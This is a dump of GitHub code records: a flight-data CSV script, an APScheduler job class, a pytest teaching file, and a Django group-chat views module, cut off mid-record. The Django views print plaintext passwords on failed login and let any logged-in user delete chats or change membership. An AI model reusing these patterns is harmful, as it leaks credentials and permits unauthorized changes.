outfile:\n fieldnames = [\"UTC_TIME\", \n \"CARRIER\", \n \"ORIGIN\", \n \"DEST\", \n \"DEP_DELAY\", \n \"CANCELLED\", \n \"DST\", \n \"TEMP_ORIGIN\", \n \"PRECIP_ORIGIN\", \n \"PRECIP_TYPE_ORIGIN\",\n #\"WIND_SPEED_ORIGIN\", \n #\"WIND_BEARING_ORIGIN\", \n #\"WIND_SPEED_DEST\", \n #\"WIND_BEARING_DEST\", \n \"TEMP_DEST\", \n \"PRECIP_DEST\",\n \"PRECIP_TYPE_DEST\"]\n writer = csv.DictWriter(outfile, fieldnames)\n writer.writeheader()\n\n # Open files\n with open(filename, newline='') as csvfile: \n reader = csv.DictReader(csvfile)\n\n for row in reader:\n writer.writerow(row_handler(row))\n", "repo_name": "leonm1/FlightSense", "sub_path": "python/processStats.py", "file_name": "processStats.py", "file_ext": "py", "file_size_in_byte": 4585, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.path.abspath", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 12, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 32, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 32, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 42, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 48, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 86, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path", "line_number": 96, "usage_type": "attribute"}, {"api_name": "csv.DictWriter", "line_number": 116, "usage_type": "call"}, {"api_name": "csv.DictReader", "line_number": 121, "usage_type": "call"}]}
+{"seq_id": "2661093852", "text": "#https://apscheduler.readthedocs.io/en/3.x/userguide.html\nfrom typing import List\nfrom apscheduler.schedulers.background import BackgroundScheduler\nfrom API import settings\nfrom job_runner.job_runner import JobRunner\n\n\n\n\nclass Scheduler:\n def __init__(self):\n self.scheduler = BackgroundScheduler(timezone=settings.TIME_ZONE)\n self.job_runner = JobRunner()\n self.job = None\n\n def create_func(self, func, dep_funcs: List, **kwargs):\n func(**kwargs)\n for dep_func in dep_funcs:\n dep_func(**kwargs)\n\n def run(self):\n if not self.scheduler.running:\n self.scheduler.start()\n print(\"Scheduler has started\")\n\n def add_job(self, hours='*', minutes=\"*\"):\n job_id = \"abc\"\n cron_job = {'month': '*', 'day': '*', 'hour': hours, 'minute': minutes}\n process_articles = lambda: self.create_func(func=self.job_runner.get_new_articles,\n dep_funcs=[self.job_runner.create_playlists])\n\n #self.job_runner.save_embeddings,\n #self.job_runner.add_audio_for_new_entries,\n if self.job:\n self.scheduler.remove_job(job_id)\n self.job = self.scheduler.add_job(process_articles, 'cron', id=job_id, **cron_job)\n print(f\"Job with id {job_id} has been added\")\n\n", "repo_name": "cesko-digital/audiozpravy", "sub_path": "backend/job_runner/scheduler.py", "file_name": "scheduler.py", "file_ext": "py", "file_size_in_byte": 1334, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "apscheduler.schedulers.background.BackgroundScheduler", "line_number": 12, "usage_type": "call"}, {"api_name": "API.settings.TIME_ZONE", "line_number": 12, "usage_type": "attribute"}, {"api_name": "API.settings", "line_number": 12, "usage_type": "name"}, {"api_name": "job_runner.job_runner.JobRunner", "line_number": 13, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 16, "usage_type": "name"}]}
+{"seq_id": "24033461440", "text": "\"\"\"\nCreated on March 06, 2023\n\n@author: Romulo\n\"\"\"\nimport os\nimport json\n\n\ndef read_cheese_performance():\n full_path = os.path.expanduser(\"~/cheese.json\")\n\n with open(full_path, 'r') as f:\n prefs = json.load(f)\n return prefs\n\n\ndef write_cheese_preferences(prefs):\n full_path = os.path.expanduser(\"~/cheese.json\")\n\n with open(full_path, 'w') as f:\n json.dump(prefs, f, indent=4)\n\n\ndef write_defould_cheese_preferences():\n write_cheese_preferences(_default_prefs)\n\n_default_prefs = {\n 'slicing': ['manchago', 'sharp'],\n 'spreadable': ['Saint Andre', 'cambert', 'bucheron', 'goat', 'humbolt fog', 'cambozola'],\n 'salads': ['crumbled feta']\n}\n\nif __name__ == '__main__':\n write_defould_cheese_preferences()\n", "repo_name": "romulovieira777/The_Complete_Automation_PyTest_Course_for_2022", "sub_path": "Section_08_Built_in_Fixtures/monkey/cheese.py", "file_name": "cheese.py", "file_ext": "py", "file_size_in_byte": 747, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.path.expanduser", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path.expanduser", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 22, "usage_type": "call"}]}
+{"seq_id": "74565916249", "text": "import json\nfrom django.shortcuts import render, redirect, HttpResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.urls import reverse\nfrom django.contrib.auth import authenticate, login, logout\nfrom chat.models import Chat, File, UserProfile, Message, DjangoUser\nfrom chat.forms import ChangeUserDisplayName, FileForm, UserForm, UserProfileForm, ChatForm, ChangeUserProfilePic\n\n\n@login_required\ndef search_profiles(request):\n context_dict = {}\n \n if request.method == \"POST\":\n searched = request.POST['searched']\n profiles = UserProfile.objects.filter(display_name__contains=searched)\n context_dict['searched'] = searched\n context_dict['profiles'] = profiles\n return render(request, 'chat/search_profiles.html', context_dict)\n else:\n return render(request, 'chat/search_profiles.html', context_dict)\n \n\n@login_required\ndef leave_group_chat(request, chat_name_slug):\n try:\n user_profile = UserProfile.objects.get(user=request.user)\n chat = Chat.objects.get(slug=chat_name_slug)\n except Chat.DoesNotExist:\n chat = None\n chat.users.remove(user_profile)\n chat.save()\n return redirect(reverse('chat:chat'))\n\n\n@login_required\ndef get_user_chats(request):\n context_dict = {}\n try:\n chat_list = []\n for chat in Chat.objects.all():\n for user in chat.users.all():\n if str(user) == str(request.user):\n chat_list.append(chat)\n break\n context_dict['chats'] = chat_list\n except:\n context_dict['chats'] = None\n return context_dict\n\n@login_required\ndef members(request, chat_name_slug):\n context_dict = {}\n try:\n chat = Chat.objects.get(slug=chat_name_slug)\n chat_members = Chat.objects.get(slug=chat_name_slug).users.all()\n chat_owner = chat.owner\n user = UserProfile.objects.filter(user=request.user)\n # chat_image = chat.image #could someone add this to data base\n except:\n chat = None\n chat_members = None\n chat_owner = None\n context_dict['chat_name'] = chat\n context_dict['chat_members'] = chat_members\n context_dict['chat_name_slug'] = chat_name_slug\n context_dict['owner'] = chat_owner\n context_dict['current_user'] = user.get()\n print(user.get(), chat_owner)\n return render(request, 'chat/members.html', context_dict)\n\n@login_required\ndef remove_member(request, chat_name_slug, username):\n user = DjangoUser.objects.get(username=username)\n userProfile = UserProfile.objects.get(user=user)\n chat = Chat.objects.get(slug=chat_name_slug)\n chat.users.remove(userProfile)\n chat.save()\n Chat.objects.get(slug=chat_name_slug).users.remove(userProfile)\n return redirect(reverse('chat:members', args=(chat_name_slug,)))\n\n\n@login_required\ndef add_member(request, chat_name_slug, username):\n try:\n user = DjangoUser.objects.get(username=username)\n except:\n return redirect(reverse('chat:members', args=(chat_name_slug,)))\n userProfile = UserProfile.objects.get(user=user)\n chat = Chat.objects.get(slug=chat_name_slug)\n chat.users.add(userProfile)\n chat.save()\n return redirect(reverse('chat:members', args=(chat_name_slug,)))\n\n@login_required\ndef delete_account(request):\n try:\n user_profile = UserProfile.objects.get(user=request.user)\n user = DjangoUser.objects.get(userprofile=user_profile)\n except UserProfile.DoesNotExist:\n user = None\n user_profile.delete()\n user.delete()\n return redirect(reverse('chat:signup'))\n\n@login_required\ndef delete_group_chat(request, chat_name_slug):\n try:\n chat = Chat.objects.get(slug=chat_name_slug)\n except Chat.DoesNotExist:\n chat = None\n chat.delete()\n return redirect(reverse('chat:chat')) \n\n@login_required\ndef files(request, chat_name_slug):\n context_dict = {}\n form = FileForm\n context_dict['form'] = form\n try:\n chat = Chat.objects.get(slug=chat_name_slug)\n user = UserProfile.objects.filter(user=request.user)\n chat_owner = chat.owner\n except:\n chat = None\n user = None\n context_dict['chat_name_slug'] = chat_name_slug\n context_dict['chat_name'] = chat\n context_dict['current_user'] = user.get()\n context_dict['owner'] = chat_owner\n context_dict['files'] = File.objects.filter(chat=chat)\n if request.method == 'POST':\n form = FileForm(request.POST, request.FILES)\n if form.is_valid():\n print('valid form')\n \n file_instance = form.save(commit=False)\n file_instance.chat = chat \n \n file_instance.save()\n return redirect(reverse('chat:files', kwargs={'chat_name_slug': chat_name_slug}))\n else:\n print(form.errors)\n else:\n form = FileForm()\n return render(request, 'chat/files.html', context_dict)\n\n@login_required\ndef chat(request, chat_name_slug):\n context_dict = {}\n context_dict['chats'] = Chat.objects.all()\n try:\n this_chat = Chat.objects.get(slug=chat_name_slug)\n owner = this_chat.owner\n context_dict['messages'] = Message.objects.filter(chat=this_chat)\n context_dict['owner'] = owner\n context_dict['chat_name'] = this_chat.name\n context_dict['chat_name_slug'] = this_chat.slug\n context_dict['current_user'] = UserProfile.objects.filter(user=request.user).get()\n context_dict['this_username'] = UserProfile.objects.filter(user=request.user)[0].user.username\n except Chat.DoesNotExist:\n chat = None\n return render(request, 'chat/chat.html', context_dict)\n\ndef user_login(request):\n if request.method == 'POST':\n username = request.POST.get('username')\n password = request.POST.get('password')\n user = authenticate(username=username, password=password)\n\n if user:\n if user.is_active:\n login(request, user)\n return redirect(reverse('chat:chat'))\n else:\n print(f\"Invalid login details: {username}, {password}\")\n return render(request, \"chat/login.html\", context={'invalid_login':True})\n else:\n return render(request, \"chat/login.html\", context={'invalid_login':False})\n\n@login_required\ndef main_page(request):\n return render(request, \"chat/mainpage.html\", context=get_user_chats(request))\n\n#@login_required\ndef send_message(request, chat_name_slug):\n username = request.GET['username']\n content = request.GET['content']\n chat_slug = request.GET['chat_slug']\n chat = Chat.objects.get(slug=chat_slug)\n sender = UserProfile.objects.get(user=request.user)\n if(content):\n m = Message.objects.create(content=content, chat=chat, sender=sender)\n m.save()\n return get_messages(request, chat_name_slug)\n\n#@login_required\ndef get_messages(request, chat_name_slug):\n chat_slug = request.GET['chat_slug']\n messages = Message.objects.filter(chat=Chat.objects.get(slug=chat_slug))\n messages_list = [{'pic':m.sender.picture.url,'time_stamp':str(m.time_stamp), 'sender':m.sender.user.username, 'content':m.content} for m in messages]\n return HttpResponse(json.dumps(messages_list))\n\ndef sign_up(request):\n registered = False\n\n if request.method == 'POST':\n user_form = UserForm(request.POST)\n profile_form = UserProfileForm(request.POST)\n\n if user_form.is_valid() and profile_form.is_valid():\n user = user_form.save()\n user.set_password(user.password)\n user.save()\n\n profile = profile_form.save(commit=False)\n profile.user = user\n\n if 'picture' in request.FILES:\n profile.picture = request.FILES['picture']\n\n profile.save()\n\n registered = True\n return redirect(reverse('chat:login'))\n else:\n print(user_form.errors, profile_form.errors)\n\n else:\n user_form = UserForm()\n profile_form = UserProfileForm()\n\n return render(request,'chat/signup.html',\n context={'user_form':user_form,\n 'profile_form':profile_form,\n 'registered':registered}\n )#request needs to be added\n\n@login_required\ndef create_page(request):\n context_dict = {}\n user_profiles = UserProfile.objects.all()\n usernames = [i.user.username for i in user_profiles]\n context_dict['all_users'] = user_profiles\n context_dict['usernames'] = json.dumps(usernames)\n context_dict['current_user'] = json.dumps(request.user.username)\n \n if request.method == 'POST':\n members_str = request.POST.get('user_list')\n try:\n members = json.loads(members_str)\n except:\n members = []\n owner = UserProfile.objects.get(user=request.user)\n chat_form = ChatForm(request.POST, request.FILES)\n user_list = []\n for i in user_profiles:\n if i.user.username in members:\n user_list.append(i)\n\n if chat_form.is_valid():\n print('valid')\n chat = chat_form.save(commit=False)\n chat.save()\n chat.users.add(owner)\n for i in user_list:\n chat.users.add(i)\n chat.save()\n return redirect('chat:chat')\n else:\n print(chat_form.errors)\n else:\n chat_form = ChatForm()\n \n return render(request,'chat/createchat.html',context=context_dict)\n\n@login_required\ndef user_logout(request):\n logout(request)\n return redirect(reverse('chat:login'))#need to add a reverse url\n\ndef test(request):\n return render(request,'chat/test.html',context = {})\n\n@login_required\ndef profile(request):\n context_dict = {}\n pic_form = ChangeUserProfilePic\n display_name_form = ChangeUserDisplayName\n try:\n context_dict['display_name_form'] = display_name_form\n context_dict['pic_form'] = pic_form\n context_dict['current_user'] = UserProfile.objects.filter(user=request.user).get()\n except:\n context_dict['current_user'] = None\n \n if request.method == 'POST':\n \n \n user = UserProfile.objects.get(user=request.user)\n form_type = request.POST.get('form_type')\n if form_type == 'display_name_form':\n display_name_form = ChangeUserDisplayName(request.POST)\n if display_name_form.is_valid():\n print('valid display')\n display_name = display_name_form.cleaned_data['display_name']\n user.display_name = display_name\n user.save()\n return redirect('chat:profile')\n # handle display_name_form submission\n else:\n print(display_name_form.errors)\n elif form_type == 'pic_form':\n pic_form = ChangeUserProfilePic(request.POST, request.FILES)\n if pic_form.is_valid():\n print('valid')\n picture = pic_form.cleaned_data['picture']\n user.picture = picture\n user.save()\n return redirect('chat:profile')\n else:\n print(pic_form.errors)\n else:\n display_name_form = ChangeUserDisplayName()\n pic_form = ChangeUserProfilePic()\n\n \n return render(request,'chat/profile.html',context=context_dict)\n", "repo_name": "JoeJ1/WAD2_Group_Project", "sub_path": "chat/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 11443, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "chat.models.UserProfile.objects.filter", "line_number": 16, "usage_type": "call"}, {"api_name": "chat.models.UserProfile.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "chat.models.UserProfile", "line_number": 16, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 19, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 21, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 10, "usage_type": "name"}, {"api_name": "chat.models.UserProfile.objects.get", "line_number": 27, "usage_type": "call"}, {"api_name": "chat.models.UserProfile.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "chat.models.UserProfile", "line_number": 27, "usage_type": "name"}, {"api_name": "chat.models", "line_number": 28, "usage_type": "name"}, {"api_name": "chat.models.Chat.objects.get", "line_number": 28, "usage_type": "call"}, {"api_name": "chat.models.Chat.objects", "line_number": 28, "usage_type": "attribute"}, {"api_name": "chat.models.Chat", "line_number": 28, "usage_type": "name"}, {"api_name": "chat.models.Chat.DoesNotExist", "line_number": 29, "usage_type": "attribute"}, {"api_name": "chat.models.Chat", "line_number": 29, "usage_type": "name"}, {"api_name": "chat.models", "line_number": 30, "usage_type": "name"}, {"api_name": "chat.models.users.remove", "line_number": 31, "usage_type": "call"}, {"api_name": "chat.models.users", "line_number": 31, "usage_type": "attribute"}, {"api_name": "chat.models", "line_number": 31, "usage_type": "name"}, {"api_name": "chat.models.save", "line_number": 32, "usage_type": "call"}, {"api_name": "chat.models", "line_number": 32, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 33, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 33, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 24, "usage_type": "name"}, {"api_name": "chat.models", "line_number": 41, "usage_type": "name"}, {"api_name": "chat.models.Chat.objects.all", "line_number": 41, "usage_type": "call"}, {"api_name": "chat.models.Chat.objects", "line_number": 41, "usage_type": "attribute"}, {"api_name": "chat.models.Chat", "line_number": 41, "usage_type": "name"}, {"api_name": "chat.models.users.all", "line_number": 42, "usage_type": "call"}, {"api_name": "chat.models.users", "line_number": 42, "usage_type": "attribute"}, {"api_name": "chat.models", "line_number": 42, "usage_type": "name"}, {"api_name": "chat.models", "line_number": 44, "usage_type": "argument"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 36, "usage_type": "name"}, {"api_name": "chat.models", "line_number": 55, "usage_type": "name"}, {"api_name": "chat.models.Chat.objects.get", "line_number": 55, "usage_type": "call"}, {"api_name": "chat.models.Chat.objects", "line_number": 55, "usage_type": "attribute"}, {"api_name": "chat.models.Chat", "line_number": 55, "usage_type": "name"}, {"api_name": "chat.models.Chat.objects.get", "line_number": 56, "usage_type": "call"}, {"api_name": "chat.models.Chat.objects", "line_number": 56, "usage_type": "attribute"}, {"api_name": "chat.models.Chat", "line_number": 56, "usage_type": "name"}, {"api_name": "chat.models.owner", "line_number": 57, "usage_type": "attribute"}, {"api_name": "chat.models", "line_number": 57, "usage_type": "name"}, {"api_name": "chat.models.UserProfile.objects.filter", "line_number": 58, "usage_type": "call"}, {"api_name": "chat.models.UserProfile.objects", "line_number": 58, "usage_type": "attribute"}, {"api_name": "chat.models.UserProfile", "line_number": 58, "usage_type": "name"}, {"api_name": "chat.models", "line_number": 61, "usage_type": "name"}, {"api_name": "chat.models", "line_number": 64, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 70, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 51, "usage_type": "name"}, {"api_name": "chat.models.DjangoUser.objects.get", "line_number": 74, "usage_type": "call"}, {"api_name": "chat.models.DjangoUser.objects", "line_number": 74, "usage_type": "attribute"}, {"api_name": "chat.models.DjangoUser", "line_number": 74, "usage_type": "name"}, {"api_name": "chat.models.UserProfile.objects.get", "line_number": 75, "usage_type": "call"}, {"api_name": "chat.models.UserProfile.objects", "line_number": 75, "usage_type": "attribute"}, {"api_name": "chat.models.UserProfile", "line_number": 75, "usage_type": "name"}, {"api_name": "chat.models", "line_number": 76, "usage_type": "name"}, {"api_name": "chat.models.Chat.objects.get", "line_number": 76, "usage_type": "call"}, {"api_name": "chat.models.Chat.objects", "line_number": 76, "usage_type": "attribute"}, {"api_name": "chat.models.Chat", "line_number": 76, "usage_type": "name"}, {"api_name": "chat.models.users.remove", "line_number": 77, "usage_type": "call"}, {"api_name": "chat.models.users", "line_number": 77, "usage_type": "attribute"}, {"api_name": "chat.models", "line_number": 77, "usage_type": "name"}, {"api_name": "chat.models.save", "line_number": 78, "usage_type": "call"}, {"api_name": "chat.models", "line_number": 78, "usage_type": "name"}, {"api_name": "chat.models.Chat.objects.get", "line_number": 79, "usage_type": "call"}, {"api_name": "chat.models.Chat.objects", "line_number": 79, "usage_type": "attribute"}, {"api_name": "chat.models.Chat", "line_number": 79, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 80, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 80, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 72, "usage_type": "name"}, {"api_name": "chat.models.DjangoUser.objects.get", "line_number": 86, "usage_type": "call"}, {"api_name": "chat.models.DjangoUser.objects", "line_number": 86, "usage_type": "attribute"}, {"api_name": "chat.models.DjangoUser", "line_number": 86, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 88, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 88, "usage_type": "call"}, {"api_name": "chat.models.UserProfile.objects.get", "line_number": 89, "usage_type": "call"}, {"api_name": "chat.models.UserProfile.objects", "line_number": 89, "usage_type": "attribute"}, {"api_name": "chat.models.UserProfile", "line_number": 89, "usage_type": "name"}, {"api_name": "chat.models", "line_number": 90, "usage_type": "name"}, {"api_name": "chat.models.Chat.objects.get", "line_number": 90, "usage_type": "call"}, {"api_name": "chat.models.Chat.objects", "line_number": 90, "usage_type": "attribute"}, {"api_name": "chat.models.Chat", "line_number": 90, "usage_type": "name"}, {"api_name": "chat.models.users.add", "line_number": 91, "usage_type": "call"}, {"api_name": "chat.models.users", "line_number": 91, "usage_type": "attribute"}, {"api_name": "chat.models", "line_number": 91, "usage_type": "name"}, {"api_name": "chat.models.save", "line_number": 92, "usage_type": "call"}, {"api_name": "chat.models", "line_number": 92, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 93, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 93, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 83, "usage_type": "name"}, {"api_name": "chat.models.UserProfile.objects.get", "line_number": 98, "usage_type": "call"}, {"api_name": "chat.models.UserProfile.objects", "line_number": 98, "usage_type": "attribute"}, {"api_name": "chat.models.UserProfile", "line_number": 98, "usage_type": "name"}, {"api_name": "chat.models.DjangoUser.objects.get", "line_number": 99, "usage_type": "call"}, {"api_name": "chat.models.DjangoUser.objects", "line_number": 99, "usage_type": "attribute"}, {"api_name": "chat.models.DjangoUser", "line_number": 99, "usage_type": "name"}, {"api_name": "chat.models.UserProfile.DoesNotExist", "line_number": 100, "usage_type": "attribute"}, {"api_name": "chat.models.UserProfile", "line_number": 100, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 104, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 104, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 95, "usage_type": "name"}, {"api_name": "chat.models", "line_number": 109, "usage_type": "name"}, {"api_name": "chat.models.Chat.objects.get", "line_number": 109, "usage_type": "call"}, {"api_name": "chat.models.Chat.objects", "line_number": 109, "usage_type": "attribute"}, {"api_name": "chat.models.Chat", "line_number": 109, "usage_type": "name"}, {"api_name": "chat.models.Chat.DoesNotExist", "line_number": 110, "usage_type": "attribute"}, {"api_name": "chat.models.Chat", "line_number": 110, "usage_type": "name"}, {"api_name": "chat.models", "line_number": 111, "usage_type": "name"}, {"api_name": "chat.models.delete", "line_number": 112, "usage_type": "call"}, {"api_name": "chat.models", "line_number": 112, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 113, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 113, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 106, "usage_type": "name"}, {"api_name": "chat.forms.FileForm", "line_number": 118, "usage_type": "name"}, {"api_name": "chat.models", "line_number": 121, "usage_type": "name"}, {"api_name": "chat.models.Chat.objects.get", "line_number": 121, "usage_type": "call"}, {"api_name": "chat.models.Chat.objects", "line_number": 121, "usage_type": "attribute"}, {"api_name": "chat.models.Chat", "line_number": 121, "usage_type": "name"}, {"api_name": "chat.models.UserProfile.objects.filter", "line_number": 122, "usage_type": "call"}, {"api_name": "chat.models.UserProfile.objects", "line_number": 122, "usage_type": "attribute"}, {"api_name": "chat.models.UserProfile", "line_number": 122, "usage_type": "name"}, {"api_name": "chat.models.owner", "line_number": 123, "usage_type": "attribute"}, {"api_name": "chat.models", "line_number": 123, "usage_type": "name"}, {"api_name": "chat.models", "line_number": 125, "usage_type": "name"}, {"api_name": "chat.models", "line_number": 128, "usage_type": "name"}, {"api_name": "chat.models.File.objects.filter", "line_number": 131, "usage_type": "call"}, {"api_name": "chat.models.File.objects", "line_number": 131, "usage_type": "attribute"}, {"api_name": "chat.models.File", "line_number": 131, "usage_type": "name"}, {"api_name": "chat.models", "line_number": 131, "usage_type": "name"}, {"api_name": "chat.forms.FileForm", "line_number": 133, "usage_type": "call"}, {"api_name": "chat.models", "line_number": 138, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 141, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 141, "usage_type": "call"}, {"api_name": "chat.forms.FileForm", "line_number": 145, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 146, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 115, "usage_type": "name"}, {"api_name": "chat.models.Chat.objects.all", "line_number": 151, "usage_type": "call"}, {"api_name": "chat.models.Chat.objects", "line_number": 151, "usage_type": "attribute"}, {"api_name": "chat.models.Chat", "line_number": 151, "usage_type": "name"}, {"api_name": "chat.models.Chat.objects.get", "line_number": 153, "usage_type": "call"}, {"api_name": "chat.models.Chat.objects", "line_number": 153, "usage_type": "attribute"}, {"api_name": "chat.models.Chat", "line_number": 153, "usage_type": "name"}, {"api_name": "chat.models.Message.objects.filter", "line_number": 155, "usage_type": "call"}, {"api_name": "chat.models.Message.objects", "line_number": 155, "usage_type": "attribute"}, {"api_name": "chat.models.Message", "line_number": 155, "usage_type": "name"}, {"api_name": "chat.models.UserProfile.objects.filter", "line_number": 159, "usage_type": "call"}, {"api_name": "chat.models.UserProfile.objects", "line_number": 159, "usage_type": "attribute"}, {"api_name": "chat.models.UserProfile", "line_number": 159, "usage_type": "name"}, {"api_name": "chat.models.UserProfile.objects.filter", "line_number": 160, "usage_type": "call"}, {"api_name": "chat.models.UserProfile.objects", "line_number": 160, "usage_type": "attribute"}, {"api_name": "chat.models.UserProfile", "line_number": 160, "usage_type": "name"}, {"api_name": "chat.models.Chat.DoesNotExist", "line_number": 161, "usage_type": "attribute"}, {"api_name": "chat.models.Chat", "line_number": 161, "usage_type": "name"}, {"api_name": "chat.models", "line_number": 162, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 163, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 148, "usage_type": "name"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 169, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 173, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 174, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 174, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 177, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 179, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 183, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 181, "usage_type": "name"}, {"api_name": "chat.models", "line_number": 190, "usage_type": "name"}, {"api_name": "chat.models.Chat.objects.get", "line_number": 190, "usage_type": "call"}, {"api_name": "chat.models.Chat.objects", "line_number": 190, "usage_type": "attribute"}, {"api_name": "chat.models.Chat", "line_number": 190, "usage_type": "name"}, {"api_name": "chat.models.UserProfile.objects.get", "line_number": 191, "usage_type": "call"}, {"api_name": "chat.models.UserProfile.objects", "line_number": 191, "usage_type": "attribute"}, {"api_name": "chat.models.UserProfile", "line_number": 191, "usage_type": "name"}, {"api_name": "chat.models.Message.objects.create", "line_number": 193, "usage_type": "call"}, {"api_name": "chat.models.Message.objects", "line_number": 193, "usage_type": "attribute"}, {"api_name": "chat.models.Message", "line_number": 193, "usage_type": "name"}, {"api_name": "chat.models", "line_number": 193, "usage_type": "name"}, {"api_name": "chat.models.Message.objects.filter", "line_number": 200, "usage_type": "call"}, {"api_name": "chat.models.Message.objects", "line_number": 200, "usage_type": "attribute"}, {"api_name": "chat.models.Message", "line_number": 200, "usage_type": "name"}, {"api_name": "chat.models.Chat.objects.get", "line_number": 200, "usage_type": "call"}, {"api_name": "chat.models.Chat.objects", "line_number": 200, "usage_type": "attribute"}, {"api_name": "chat.models.Chat", "line_number": 200, "usage_type": "name"}, {"api_name": "django.shortcuts.HttpResponse", "line_number": 202, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 202, "usage_type": "call"}, {"api_name": "chat.forms.UserForm", "line_number": 208, "usage_type": "call"}, {"api_name": "chat.forms.UserProfileForm", "line_number": 209, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 225, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 225, "usage_type": "call"}, {"api_name": "chat.forms.UserForm", "line_number": 230, "usage_type": "call"}, {"api_name": "chat.forms.UserProfileForm", "line_number": 231, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 233, "usage_type": "call"}, {"api_name": "chat.models.UserProfile.objects.all", "line_number": 242, "usage_type": "call"}, {"api_name": "chat.models.UserProfile.objects", "line_number": 242, "usage_type": "attribute"}, {"api_name": "chat.models.UserProfile", "line_number": 242, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 245, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 246, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 251, "usage_type": "call"}, {"api_name": "chat.models.UserProfile.objects.get", "line_number": 254, "usage_type": "call"}, {"api_name": "chat.models.UserProfile.objects", "line_number": 254, "usage_type": "attribute"}, {"api_name": "chat.models.UserProfile", "line_number": 254, "usage_type": "name"}, {"api_name": "chat.forms.ChatForm", "line_number": 255, "usage_type": "call"}, {"api_name": "chat.models", "line_number": 263, "usage_type": "name"}, {"api_name": "chat.models.save", "line_number": 264, "usage_type": "call"}, {"api_name": "chat.models", "line_number": 264, "usage_type": "name"}, {"api_name": "chat.models.users.add", "line_number": 265, "usage_type": "call"}, {"api_name": "chat.models.users", "line_number": 265, "usage_type": "attribute"}, {"api_name": "chat.models", "line_number": 265, "usage_type": "name"}, {"api_name": "chat.models.users.add", "line_number": 267, "usage_type": "call"}, {"api_name": "chat.models.users", "line_number": 267, "usage_type": "attribute"}, {"api_name": "chat.models", "line_number": 267, "usage_type": "name"}, {"api_name": "chat.models.save", "line_number": 268, "usage_type": "call"}, {"api_name": "chat.models", "line_number": 268, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 269, "usage_type": "call"}, {"api_name": "chat.forms.ChatForm", "line_number": 273, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 275, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 239, "usage_type": "name"}, {"api_name": 